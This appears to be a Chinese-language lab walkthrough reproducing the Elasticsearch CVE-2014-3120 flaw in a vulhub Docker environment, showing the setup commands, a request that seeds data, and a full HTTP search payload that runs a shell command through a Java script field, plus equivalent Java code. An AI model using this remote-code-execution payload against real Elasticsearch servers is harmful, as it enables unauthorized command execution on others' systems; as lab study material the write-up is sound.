环境配置

vulhub环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101

启动docker环境

cd vulhub-master/elasticsearch/CVE-2014-3120/
sudo docker-compose up

9200 端口已开启

访问目标的9200，会出现Elasticsearch的信息：

利用该漏洞要求Elasticsearch中有数据，所以先创建一条数据，采用Burp发送数据包：

POST /website/blog/  HTTP/1.1
Host: 192.168.91.130:9200
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 27{"name": "colleget"
}

返回201状态码，代表创建成功：

利用该漏洞的Payload如下：

POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 368{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}
}}
}

其中JAVA等价于：

String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next();
//A means "start of string", and \z means "end of string".
String s2  = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next();
System.out.println(s1);